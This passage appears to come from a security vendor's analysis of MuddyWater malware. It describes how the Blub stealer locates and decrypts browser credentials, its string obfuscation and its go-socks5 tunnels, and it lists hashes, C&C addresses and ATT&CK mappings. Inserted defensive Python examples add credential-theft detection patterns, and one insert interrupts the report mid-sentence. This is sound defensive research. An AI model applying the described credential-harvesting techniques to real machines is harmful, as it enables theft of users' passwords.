Finally, to decrypt saved user credentials for Mozilla Firefox, Blub parses the hostname, encryptedUsername, and encryptedPassword values from the logins.json file in each user's profile directory, i.e., %APPDATAROAMING%\Mozilla\Firefox\Profiles\<profile_name>. The credentials are then decrypted using the PK11SDR_Decrypt function from the nss3.dll library used by Firefox.

The collected data is saved into a local file named file.txt, with no encryption. The same data is logged to the console, with no encryption, along with verbose status messages. Blub has no capability to exfiltrate this file.

Note that Blub checks for running processes associated with security solutions before executing its malicious payload, focusing on the combination of the afwServ.exe (Avast firewall) and AvastSvc.exe (Avast antivirus) processes. If afwServ.exe is detected running (but not AvastSvc.exe), Blub concludes that Norton (which now uses the Avast engine) is running on the compromised host, and exits. If AvastSvc.exe (Avast) is detected, Blub continues with the execution, except that it skips stealing credentials from Microsoft Edge.

While Blub's strings are stored in cleartext, a simple obfuscation technique is used for strings associated with the Google Chrome data stealer functionality. Specifically, several strings are concatenated into one long string, with 16 random characters between them, apparently to hide them from view during static analysis:
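The access pattern described above (a non-browser process terminating the browser, reading the DPAPI-protected key in Local State, then reading the Login Data or logins.json credential stores) and the local staging of credentials in C:\Users\Public\Downloads\lp-notes.txt are what a defender can look for. The following is an added detection example, not ESET code or anything from the page's tooling; it runs over constructed, simplified telemetry (dicts standing in for Sysmon-style file-access and process-terminate records), and the browser process names other than chrome.exe, the event field names and the scoring weights are my assumptions.

```python
"""Score (host, process) pairs for the Blub/LP-Notes credential-theft pattern.

Constructed, simplified telemetry: each event is a dict with the fields a
Sysmon-style file-access or process-terminate record would carry.
"""
import re
from collections import defaultdict

# Browser process names; chrome.exe is from the page, the others are assumed.
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "opera.exe"}

# Paths the page says Blub reads: the DPAPI-protected key in "Local State"
# (Chrome/Edge under AppData\Local, Opera under AppData\Roaming) and the
# credential stores "Login Data" (Chromium profiles) and logins.json (Firefox).
LOCAL_STATE = re.compile(
    r"\\(Google\\Chrome|Microsoft\\Edge|Opera Software\\Opera Stable)\\"
    r"(User Data\\)?Local State$", re.IGNORECASE)
LOGIN_DATA = re.compile(r"\\Login Data$", re.IGNORECASE)
FIREFOX_LOGINS = re.compile(
    r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\logins\.json$", re.IGNORECASE)
# LP-Notes' staging file and Blub's unencrypted output file name (both from the page).
LP_NOTES = re.compile(r"\\Users\\Public\\Downloads\\lp-notes\.txt$", re.IGNORECASE)
BLUB_OUT = re.compile(r"\\file\.txt$", re.IGNORECASE)

# Constructed sample telemetry (not real logs); ts is an ordering key only.
EVENTS = [
    {"ts": 1, "host": "WS01", "type": "file_read", "process": "chrome.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"},
    {"ts": 2, "host": "WS01", "type": "process_terminate", "process": "stealer.exe",
     "target": "chrome.exe"},
    {"ts": 3, "host": "WS01", "type": "file_read", "process": "stealer.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"},
    {"ts": 4, "host": "WS01", "type": "file_read", "process": "stealer.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"ts": 5, "host": "WS01", "type": "file_read", "process": "stealer.exe",
     "path": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release\logins.json"},
    {"ts": 6, "host": "WS01", "type": "file_write", "process": "stealer.exe",
     "path": r"C:\Users\alice\Desktop\file.txt"},
    {"ts": 7, "host": "WS02", "type": "file_write", "process": "3a70e4c8c2IVcQn.exe",
     "path": r"C:\Users\Public\Downloads\lp-notes.txt"},
    # Benign: a "Local State" file outside any browser directory.
    {"ts": 8, "host": "WS02", "type": "file_read", "process": "backup.exe",
     "path": r"C:\Users\bob\Documents\Local State"},
]


def classify(event):
    """Return (weight, reason) for one event, or None if it is not of interest."""
    proc = event["process"].lower()
    if event["type"] == "process_terminate":
        target = event.get("target", "").lower()
        if target in BROWSER_PROCESSES and proc not in BROWSER_PROCESSES:
            return 1, "terminated browser " + target
        return None
    if proc in BROWSER_PROCESSES:
        return None  # browsers legitimately touch their own stores
    path = event.get("path", "")
    if event["type"] == "file_read":
        if LOCAL_STATE.search(path):
            return 2, "read Chromium key file (Local State)"
        if LOGIN_DATA.search(path) or FIREFOX_LOGINS.search(path):
            return 2, "read browser credential store"
    elif event["type"] == "file_write":
        if LP_NOTES.search(path):
            return 3, "wrote LP-Notes staging file"
        if BLUB_OUT.search(path):
            return 1, "wrote file.txt (Blub output name; weak on its own)"
    return None


def detect(events, threshold=3):
    """Aggregate weights per (host, process) and return alerts above threshold."""
    scores = defaultdict(int)
    reasons = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        hit = classify(ev)
        if hit is None:
            continue
        key = (ev["host"], ev["process"].lower())
        scores[key] += hit[0]
        reasons[key].append(hit[1])
    alerts = [{"host": h, "process": p, "score": s, "reasons": reasons[(h, p)]}
              for (h, p), s in scores.items() if s >= threshold]
    return sorted(alerts, key=lambda a: -a["score"])


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["host"], alert["process"], alert["score"], "; ".join(alert["reasons"]))
```

A single read of Local State or a single file.txt write stays below the threshold; the combination the page describes (browser killed, key file read, credential store read) scores well above it, and a write to the lp-notes.txt staging path alerts on its own.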

gdGlog}o{eRwjpw&”encrypted_key”:FAe[b-vcJvxGImpersonateLoggehgdOvlgt_NxuoolOpenProcessTokenVLUKKW’xxqjpwe}uDuplicateTokenExs5&}vleIpuvvkdXznx(Ghn2(sh|y⌂ryme~ds~

Removing the junk characters and splitting the strings returns:

  • “encrypted_key”:
  • ImpersonateLogge
  • OpenProcessToken
  • DuplicateTokenEx
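Recovering the strings from this layout is a de-interleaving job: the real strings and the junk runs alternate in 16-character slots. The following is an added example, not ESET's or the malware author's code. The blob it works on is constructed to match the layout described above, reusing the four strings recovered on the page; the junk runs are invented, because the blob quoted above does not have uniform 16-character junk runs (presumably non-printable bytes did not survive extraction, which is an assumption). The phase-guessing heuristic is mine as well.

```python
"""De-interleave Blub-style obfuscated strings: 16-character real strings
alternate with 16-character runs of junk."""
import string

CHUNK = 16
# Characters typical of API names and JSON keys; used only by the phase heuristic.
IDENT_CHARS = set(string.ascii_letters + string.digits + '_":')

# Constructed blob: junk, real, junk, real, ... (junk runs invented for the example).
SAMPLE_BLOB = (
    "gdGlog}o{eRwjpw&" + '"encrypted_key":'
    + "FAe[b-vcJvxG#Q1z" + "ImpersonateLogge"
    + "hgdOvlgt_Nxuool9" + "OpenProcessToken"
    + "VLUKKW'xxqjpwe}u" + "DuplicateTokenEx"
    + "s5&}vleIpuvvkdXz"
)


def identifier_ratio(s):
    """Fraction of characters that could appear in an identifier or JSON key."""
    return sum(c in IDENT_CHARS for c in s) / max(len(s), 1)


def guess_phase(blob, chunk=CHUNK):
    """Return the start offset (0 or chunk) of the slots that look like real strings."""
    best_score, best_start = -1.0, 0
    for start in (0, chunk):
        chunks = [blob[i:i + chunk] for i in range(start, len(blob), 2 * chunk)]
        score = sum(identifier_ratio(c) for c in chunks) / max(len(chunks), 1)
        if score > best_score:
            best_score, best_start = score, start
    return best_start


def deinterleave(blob, chunk=CHUNK, anchor=None):
    """Extract the real strings from an interleaved blob.

    If `anchor` (a string known to be real, such as the JSON key name) is given,
    its offset fixes the phase; otherwise the phase is guessed from character
    statistics, which is less reliable on short blobs.
    """
    if anchor is not None:
        pos = blob.find(anchor)
        if pos < 0:
            raise ValueError("anchor not present in blob")
        start = pos % (2 * chunk)
    else:
        start = guess_phase(blob, chunk)
    return [blob[i:i + chunk] for i in range(start, len(blob), 2 * chunk)
            if blob[i:i + chunk]]


if __name__ == "__main__":
    for s in deinterleave(SAMPLE_BLOB, anchor='"encrypted_key":'):
        print(s)
```

Note that the output reproduces the 16-character truncation visible in the list above (ImpersonateLogge rather than ImpersonateLoggedOnUser): the routine recovers what is stored in each slot, and the remainder of a longer name has to be looked for in a later slot or elsewhere in the binary.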

go‑socks5 reverse tunnels

MuddyWater’s go‑socks5 reverse tunnels are a collection of Go-compiled tools, based on publicly available libraries such as go‑socks5, yamux, and resocks; they have been frequently used in MuddyWater’s recent campaigns.

Most of the variants we analyzed appear to be internally named ESETGO (no relation to ESET), based on the build configuration strings shown in Figure 9 and in other artifacts.

path  ESETGO
mod   ESETGO	(devel)
dep	github.com/armon/go-socks5	v0.0.0-20160902184237-e75332964ef5	h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=
dep	  github.com/hashicorp/yamux	v0.1.1	h1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=
dep	  golang.org/x/net	v0.29.0	h1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=
dep	  golang.org/x/sys	v0.25.0	h1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=
build -buildmode=exe
build -compiler=gc
build -ldflags="-w -s"
build CGO_ENABLED=1
build CGO_CFLAGS=
build CGO_CPPFLAGS=
build CGO_CXXFLAGS=
build CGO_LDFLAGS=
build GOARCH=amd64
build GOOS=windows
build GOAMD64=v1

Figure 9. Build configuration strings from MuddyWater’s go‑socks5 variants

The primary purpose of MuddyWater’s go‑socks5 proxy is to relay communication between the compromised machine (on a specific port) and a hardcoded C&C server, using a hardcoded connection key to authenticate with the C&C server via SSL/TLS. This setup allows the attacker to route C&C traffic (potentially related to other compromises) through the compromised machine and thus to hide the location of the real C&C server.
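The build configuration in Figure 9 is the format printed by `go version -m <binary>`, and its fields (module path, dependencies, linker flags, target OS) are a convenient triage surface for hunting related samples. The following is an added example, not ESET tooling: it parses that listing and reports the traits the page associates with MuddyWater's go-socks5 variants, namely the ESETGO module path, the go-socks5/yamux/resocks libraries, and a Windows build with stripped symbols. The sample text is the Figure 9 listing with tab separators restored; the library-name matching by last path element is my choice.

```python
"""Triage Go build metadata of the kind printed by `go version -m`."""

# Figure 9 from the page, tab-separated as the tool prints it.
FIGURE9 = (
    "path\tESETGO\n"
    "mod\tESETGO\t(devel)\n"
    "dep\tgithub.com/armon/go-socks5\tv0.0.0-20160902184237-e75332964ef5\t"
    "h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=\n"
    "dep\tgithub.com/hashicorp/yamux\tv0.1.1\th1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=\n"
    "dep\tgolang.org/x/net\tv0.29.0\th1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=\n"
    "dep\tgolang.org/x/sys\tv0.25.0\th1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=\n"
    "build\t-buildmode=exe\n"
    "build\t-compiler=gc\n"
    "build\t-ldflags=\"-w -s\"\n"
    "build\tCGO_ENABLED=1\n"
    "build\tCGO_CFLAGS=\n"
    "build\tCGO_CPPFLAGS=\n"
    "build\tCGO_CXXFLAGS=\n"
    "build\tCGO_LDFLAGS=\n"
    "build\tGOARCH=amd64\n"
    "build\tGOOS=windows\n"
    "build\tGOAMD64=v1\n"
)

# Library names (last path element) the page names as the basis of the tunnels.
TUNNEL_LIBS = {"go-socks5", "yamux", "resocks"}


def parse_buildinfo(text):
    """Parse `go version -m` output into path, module, deps and build settings."""
    info = {"path": None, "mod": None, "deps": {}, "build": {}}
    for line in text.splitlines():
        # Tab-separated as printed; fall back to whitespace for hand-copied text.
        fields = line.split("\t") if "\t" in line else line.split()
        if len(fields) < 2:
            continue
        kind, value = fields[0], fields[1]
        if kind == "path":
            info["path"] = value
        elif kind == "mod":
            info["mod"] = value
        elif kind == "dep":
            # dep <module> <version> <hash>
            info["deps"][value] = fields[2] if len(fields) > 2 else ""
        elif kind == "build":
            key, _, val = value.partition("=")
            info["build"][key] = val.strip('"')
    return info


def tunnel_libs(info):
    """Names of known tunnelling libraries among the dependencies."""
    return {mod.rsplit("/", 1)[-1] for mod in info["deps"]} & TUNNEL_LIBS


def is_stripped(info):
    """True when the linker was told to drop the symbol table and DWARF (-s -w)."""
    flags = set(info["build"].get("-ldflags", "").split())
    return {"-s", "-w"} <= flags


def triage(info):
    """Return human-readable findings; an empty list means nothing of note."""
    findings = []
    if "ESETGO" in (info["path"], info["mod"]):
        findings.append("module path ESETGO (seen in MuddyWater's go-socks5 variants)")
    libs = tunnel_libs(info)
    if libs:
        findings.append("tunnelling libraries: " + ", ".join(sorted(libs)))
    if info["build"].get("GOOS") == "windows" and is_stripped(info):
        findings.append("Windows build with stripped symbols (-ldflags -w -s)")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_buildinfo(FIGURE9)):
        print(finding)
```

None of these traits is malicious on its own (many legitimate Go programs are stripped and depend on yamux), so the findings are meant to prioritise samples for analysis, not to convict them; the ESETGO module path is the most specific of the three.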

Conclusion

This campaign indicates an evolution in the operational maturity of MuddyWater. The deployment of previously undocumented components – such as the Fooder loader and MuddyViper backdoor – signals an effort to enhance stealth, persistence, and credential harvesting capabilities. The use of game-inspired evasion techniques, reverse tunneling, and a diversified toolset reflects a more refined approach than in earlier campaigns, even though traces of the group’s operational immaturity remain.

MuddyWater continues to demonstrate the ability to execute campaigns ranging from average to above average, i.e., being timely, effective, and increasingly challenging to defend against. While we assess that MuddyWater will remain a leading actor in Iranian-nexus activity, we anticipate a continued pattern of typical campaigns enhanced by more advanced TTPs.

ESET will continue to monitor the group’s activities, focusing on further signs of technical advancement and strategic targeting of government, military, telecommunications, and critical infrastructure.

ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

Files

SHA-1 | Filename | Detection | Description
76632910CF67697BF5D7285FAE38BFCF438EC082 | OsUpdater.exe | Win64/MuddyWater.E | MuddyWater – Fooder launcher.
1723D5EA7185D2E339FA9529D245DAA5D5C9A932 | Blub.exe | Win64/MuddyWater.H | MuddyWater – Blub browser-data stealer.
69B097D8A3205605506E6C1CC3C13B71091CB519 | Blub.exe | Win64/MuddyWater.H | MuddyWater – Blub browser-data stealer.
B7A8F09CB5FF8A33653988FFBA585118ACF24C13 | Blub.exe | Win64/MuddyWater.H | MuddyWater – Blub browser-data stealer.
B8997526E4781A6A1479690E30072F38E091899D | stealer.exe | Win64/MuddyWater.H | MuddyWater – Blub browser-data stealer.
8E21DE54638A79D8489C59D958B23FE22E90944A | 7d1e9726b5YZPYc.dll | Win32/MuddyWater.B | MuddyWater – CE-Notes browser-data stealer.
CD47420F5CE408D95C98306D78B977CDA0400C8F | fe197add74IVcQn.exe | Win64/MuddyWater.I | MuddyWater – CE-Notes browser-data stealer.
C1299E8C9A8567A9C292157F3ED65B818AA78900 | vmsvc.exe | Win64/MuddyWater.I | MuddyWater – CE-Notes browser-data stealer.
29CDA06701F9A9C0A6791775C3EB70F5B52BBEFF | 3a70e4c8c2IVcQn.exe | Win64/MuddyWater.C | MuddyWater – LP-Notes credential stealer.
8F3ED626E7B929450E36E97BA5539C8371DF0EF8 | 3a70e4c8c2IVcQn.exe | Win64/MuddyWater.C | MuddyWater – LP-Notes credential stealer.
007B5CD6D6ACF972F7743F79E23CAB9BB2ECBEE3 | Dsync-es.exe | Win64/MuddyWater.F | MuddyWater – Mimikatz loader.
CD36F93DBC4C718930593D8F029EFDCAA52B619B | App_chek.exe | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded HackBrowserData tool.
47B70C47BEB33E88B4197D6AF1B768230E51B067 | steam.exe | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded go‑socks5 reverse tunnel.
D46900D78AE036967E0B37F9EC6A8000131AE604 | antimage.exe | Win32/MuddyWater.A | MuddyWater – Fooder loader with embedded go‑socks5 reverse tunnel.
0657D0B0610618886DDD74C3D0A1D582CDD24863 | wtsapi32.dll | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor.
2939FD218E0145D730BD94AA1C76386A5259EACE | msi.dll | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor.
3BC6502A55A4D5D29132DA4D9943E154A810CC83 | WinWin.exe | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor.
7950296331802188EB99E232E2C383CB9FDD5D7D | 20241118_223247_Launcher.exe | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor.
8580824FE14DB158388102B16C1C79DFBBA36083 | Launcher.dll | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor.
B48B93B4EB69D01588D371356EDE614C5E7378DE | Launcher.exe | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor.
EA8A1C2382FF765709D7F78EF60482598E4C0DEB | vcruntime140_1.dll | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor.
EAF4BAFC62170C9FCA1F6B591848883DBF97F93D | Launcher.exe | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor.
F5EFBA6CCBA5A6AD6C3AFA928C0E5EAA44597411 | ncrypt.dll | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor.
13DA612D75DC5268F5235F5BACE6D8F0DB0091FF | WinWin(persist).exe | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor.
25361183DE63F296BA71B6FCF0725E022B3C989A | 0bff183a39ruQsY.dll | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
0E9A4892CFA1C9065B36D8F2E164E28609A8CF5D | 20d188afdcpfLFq.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
2B09241CA025BDC4455E9F6BA6009E2F27C08EDF | dttcodexgigas.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
2E9BE23CDD8152DB6CD1A54E001C4EA82FF6F1C6 | 7295be2b1fHxjyf.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
45FA7DE711FEA1F8D1E348E87834246C455DD2ED | fa54125dc8ZpaNJ.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
4E0EF2386980639FC5355FD68DAFF54EB2AD622E | 20d188afdcWgOQB.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
4E9529BA4A6E42D6278D37E3FDEE9E1D991CEBE0 | bd34a33f5bHOVby.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
50C6D4A2AD16A231CF11C43F3BBC868D90E20D25 | re.exe | WinGo/TrojanProxy.Agent.F | MuddyWater – go‑socks5 reverse tunnel.
52009F36058337B6401DA0A0F4885A0C185F0520 | bd34a33f5bHOVby.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
535882B6EDAB29247E035236A84CA510FB1E0854 | 20d188afdcpfLFq.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
544CE18E4C1F1B288DEE6018DFCF4E4D4A315F7A | 1110254b63WfTEa.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
54EBC125039CC83E4682CA44DD592534562B25C3 | FMAPP.dll | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
5A08150C1DC17E9F691296F0A577C2EC9BA8028C | bd34a33f5bJeJOf.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 proxy reverse tunnel.
5D1E61DA8083C41FF1FC23A1222A4A88B43A4E9B | bd34a33f5bJeJOf.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
6532E0437C8913FA418F1EE258561B15BBEE9052 | 7295be2b1fHxjyf.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
6CA41565844118385B345A39A9B79E0BBC0DD338 | re.exe | WinGo/TrojanProxy.Agent.F | MuddyWater – go‑socks5 reverse tunnel.
6FC50A99AAE1D6C40111632D4F49BD19F9794CF6 | 8525e604dfKuDNr.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
826CFF5D85713CE4B2F3C15AB53A84E6848D2E2C | bd34a33f5bJeJOf.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
87ADD79C7C8335447113EE0D413F52AE2B17F066 | 20d188afdcpfLFq.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
93055115559219BE8441880597C533381B99213B | main.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
97C3376AB551E899F347CC9DDF49EA01DB2D7903 | 504f53ca8esoLmG.dll | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
99FAD0862E2E8D363F3E18952FD92E09493CC27D | 20d188afdcpfLFq.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
A101CBCCD950AA36FC3B40C3C331FDE43ACDBBD2 | 66f3e097e4tnyHR.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
A227C0A4425E24268B759A740231676A589CA4E6 | fa54125dc8ZpaNJ.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
A997A7AAE727D2C12CCE80FE3607317775A4DF3E | fa54125dc8ZpaNJ.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
B0271CA76052EC340014D7BCCDBD69325A4E60F2 | 7295be2b1fAzMZI.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
B0CD4F5DF192BFFE6500E44B80C28505DFD9CA66 | 20d188afdcpfLFq.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
B16E7D56A8DC0FF6B3AFD797E1EAB22B20DFFB39 | ESETGO.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
D49979D0063B28BD73390481E6AE642C00CE0791 | 20d188afdcpfLFq.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
D518F5C648AB64B390A29AA2858219318CFC556A | bd34a33f5bHOVby.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
DF223D653F761ED55F9C0774F1DBF545FD741F86 | 66f3e097e4tnyHR.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
DF8FC5213AA11EE445EAD1AAE17A826E7D51A743 | Revoke.dll | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
E02DD79A8CAED662969F6D5D0792F2CB283116E8 | 66f3e097e4tnyHR.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
E8F4EA3857EF5FDFEC1A2063D707609251F207DB | main.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
F26CAE9E79871DF3A47FA61A755DC028C18451FC | 7295be2b1fAzMZI.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
FF09608790077E1BA52C03D9390E0805189ADAD7 | 20d188afdcpfLFq.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.
A9747A3F58F8F408FECEFC48DB0A18A1CB6DACAE | AppVs.exe | WinGo/TrojanProxy.Agent.D | MuddyWater – go‑socks5 reverse tunnel.

Network

IP | Domain | Hosting provider | First seen | Details
3.95.7[.]142 | N/A | Amazon Data Services NoVa | 2024‑09‑08 | MuddyWater C&C server.
35.175.224[.]64 | N/A | Amazon Technologies Inc. | 2024‑10‑10 | MuddyWater C&C server.
51.16.209[.]105 | api.tikavodot.co[.]il | Amazon Data Services Ireland Technical Role Account | 2024‑09‑15 | MuddyWater C&C server.
62.106.66[.]112 | N/A | RIPE-NCC-HM-MNT, ORG-NCC1-RIPE | 2024‑09‑29 | MuddyWater staging server.
157.20.182[.]45 | N/A | Hosterdaddy Private Limited | 2024‑04‑18 | MuddyWater staging server.
161.35.172[.]55 | N/A | DigitalOcean, LLC | 2022‑11‑12 | MuddyWater staging server.
167.99.224[.]13 | magicallyday[.]com | DigitalOcean, LLC | 2022‑11‑06 | MuddyWater C&C server.
194.11.246[.]78 | N/A | HosterDaddy Private Limited | 2024‑07‑23 | MuddyWater C&C server.
194.11.246[.]101 | processplanet[.]org | Administrator | 2024‑08‑27 | MuddyWater staging and C&C server.
206.71.149[.]51 | N/A | BL Networks | 2023‑10‑30 | MuddyWater staging server.
212.232.22[.]136 | N/A | HosterDaddy Private Limited | 2025‑01‑16 | MuddyWater C&C server.

MITRE ATT&CK techniques

This table was built using version 17 of the MITRE ATT&CK framework.

Tactic | ID | Name | Description
Reconnaissance | T1591 | Gather Victim Org Information | MuddyWater gathers victim org information to use in spearphishing emails.
Resource Development | T1583 | Acquire Infrastructure | MuddyWater uses acquired infrastructure to host malware download locations and C&C servers.
Resource Development | T1608 | Stage Capabilities | MuddyWater stages tools like RMM tools and data stealers on file-hosting sites such as OneHub and Mega Limited.
Resource Development | T1587.001 | Develop Capabilities: Malware | MuddyWater develops backdoors like MuddyViper and tools such as the Fooder loader, the LP-Notes credential stealer, and the Blub and CE-Notes browser-data stealers.
Resource Development | T1588.002 | Obtain Capabilities: Tool | MuddyWater uses publicly available tools from GitHub, such as HackBrowserData and Go-based reverse proxies.
Initial Access | T1566.002 | Phishing: Spearphishing Link | MuddyWater uses spearphishing emails with links to file hosting sites like OneHub and Mega Limited to host RMM software (Atera, Level, and PDQ).
Execution | T1059.001 | Command-Line Interface: PowerShell | MuddyViper has the capability to open and execute PowerShell scripts.
Execution | T1059.003 | Command-Line Interface: Windows Command Shell | MuddyViper has the capability to provide the Windows Command shell as a reverse shell.
Execution | T1559.001 | Inter-Process Communication: Component Object Model | MuddyViper uses the ITaskService COM object to create a scheduled task for persistence.
Execution | T1106 | Native API | MuddyViper uses the CreateProcess API to execute additional files and commands.
Execution | T1204.001 | User Execution: Malicious Link | MuddyWater operators rely on targets clicking malicious links delivered via spearphishing.
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | MuddyViper has the capability to copy itself to the victim's Startup folder.
Persistence | T1543.003 | Create or Modify System Process: Windows Service | MuddyWater operators attempt to install RMM tools in %PROGRAMFILES%, which also includes creating a Windows service set to autostart.
Persistence | T1053 | Scheduled Task/Job | MuddyViper can be persisted as a scheduled task named ManageOnDriveUpdater.
Defense Evasion | T1134.001 | Access Token Manipulation: Token Impersonation/Theft | The LP-Notes and CE-Notes tools attempt to impersonate a logged-on user's security context via ImpersonateLoggedOnUser.
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | Blub uses string obfuscation for storing stolen data. Fooder can extract embedded, AES-encrypted payloads. CE-Notes and LP-Notes both use a custom byte-wise decryption routine to decrypt strings.
Defense Evasion | T1620 | Reflective Code Loading | The Fooder loader performs reflective code loading to run additional tools (MuddyViper, reverse tunnels, and HackBrowserData).
Defense Evasion | T1497.003 | Virtualization/Sandbox Evasion: Time Based Evasion | MuddyViper uses many calls to a sleep function to detect and avoid virtualization and analysis environments, and generally to inhibit dynamic analysis.
Defense Evasion | T1027.007 | Obfuscated Files or Information: Dynamic API Resolution | CE-Notes and LP-Notes perform dynamic API resolution by decrypting strings at runtime.
Defense Evasion | T1134.002 | Access Token Manipulation: Create Process with Token | Fooder's launcher attempts to duplicate the token of a process specified by the operator when launching Fooder via CreateProcessAsUserA.
Defense Evasion | T1622 | Debugger Evasion | MuddyViper searches for specific debugging tools, adjusting its behavior accordingly.
Defense Evasion | T1070.009 | Indicator Removal: Clear Persistence | MuddyViper can modify registry keys used for persistence, if instructed to uninstall itself.
Defense Evasion | T1070.004 | Indicator Removal: File Deletion | MuddyViper can delete itself from the system, if instructed to uninstall itself.
Defense Evasion | T1036 | Masquerading | Some versions of Fooder masquerade as an innocuous Snake game.
Defense Evasion | T1036.004 | Masquerading: Masquerade Task or Service | MuddyViper can create a task named ManageOnDriveUpdater.
Defense Evasion | T1112 | Modify Registry | MuddyViper can modify the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup and HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup registry keys, to change the location of the Startup folder.
Defense Evasion | T1027.009 | Obfuscated Files or Information: Embedded Payloads | Fooder can extract an embedded, AES-encrypted payload.
Defense Evasion | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | Fooder can extract an embedded, AES-encrypted payload.
Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | CE-Notes and Blub attempt to steal credentials stored in browsers.
Credential Access | T1056.002 | Input Capture: GUI Input Capture | MuddyViper and LP-Notes have the ability to display a Windows security login prompt to capture login credentials and verify the credentials' veracity by relaying those credentials to legitimate Windows APIs.
Discovery | T1082 | System Information Discovery | MuddyViper collects system information from compromised systems and reports it back to the C&C server.
Discovery | T1518.001 | Software Discovery: Security Software Discovery | MuddyViper attempts to get a process list of running applications, looks for security-related processes and, if found, reports them to the C&C server and modifies its behavior.
Collection | T1074.001 | Data Staged: Local Data Staging | Blub, CE-Notes, and LP-Notes stage stolen credentials on disk for MuddyViper, reverse tunnels, or RMM tools to collect and exfiltrate.
Collection | T1560.001 | Archive Collected Data: Archive via Utility | MuddyViper uses PowerShell's Compress-Archive command to compress browser data collected via the HackBrowserData utility.
